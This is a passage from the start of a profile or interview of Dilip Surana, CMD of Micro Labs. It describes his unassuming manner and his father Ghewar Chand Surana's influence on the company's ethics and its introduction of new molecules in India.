For someone who is the CMD of a multimillion-dollar pharmaceutical giant, featuring prominently in every rich-list compiled in the country, Dilip Surana comes across as rather unassuming. Simplicity reflects from his very demeanour, be it the amiability with which he interacts with his employees or the staid, matter-offact tone he assumes while listing out his company’s various achievements. By the end of our interaction, all my initial observations converge on a single deduction: here is a man for whom his accomplishments are not merely a matter of personal pride but a moral duty, a fulfillment of his father’s legacy—one that resonates with a strong knack for business, a passion for innovation and a desire to serve and succeed, without compromising on values and ethics.
“Micro Labs has been instrumental in introducing many new molecules in India, and the inspiration to achieve this has come from my father, Ghewar Chand Surana. He always kept abreast of new global developments and was very keen on bringing the best of products to India. He also taught us to do business with ethics. ‘Don’t let moneymaking be your objective.
